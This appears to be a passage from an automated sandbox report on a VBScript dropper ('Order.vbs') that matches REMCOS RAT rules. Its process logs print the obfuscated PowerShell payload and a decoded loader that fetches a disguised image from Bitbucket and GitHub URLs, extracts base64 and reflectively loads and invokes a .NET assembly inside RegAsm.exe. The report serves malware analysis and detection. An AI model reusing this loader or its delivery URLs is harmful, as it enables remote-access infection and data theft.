Bv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A78_2_0040F4A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004176218_2_00417621
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041606A8_2_0041606A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042E2408_2_0042E240
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043120A8_2_0043120A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042B2F18_2_0042B2F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004304C18_2_004304C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041F4D38_2_0041F4D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044B4B08_2_0044B4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044553C8_2_0044553C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043163F8_2_0043163F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004476F88_2_004476F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043B6908_2_0043B690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042D79B8_2_0042D79B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043680C8_2_0043680C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040D9A08_2_0040D9A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004309BD8_2_004309BD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00436A3B8_2_00436A3B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041FB718_2_0041FB71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00445C598_2_00445C59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041FCB48_2_0041FCB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00430DD58_2_00430DD5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041EFDC8_2_0041EFDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0042BE7E appears 33 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0042C720 appears 50 times
              Source: Order.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4528
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4528Jump to behavior
              Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: Process Memory Space: powershell.exe PID: 1880, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.winVBS@10/13@4/6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00410D25 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_00410D25
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A7FF CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,8_2_0040A7FF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00413B85 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_00413B85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00413168 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_00413168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].jsonJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-MBKA6A
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oiyygwzw.jro.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Order.vbsReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
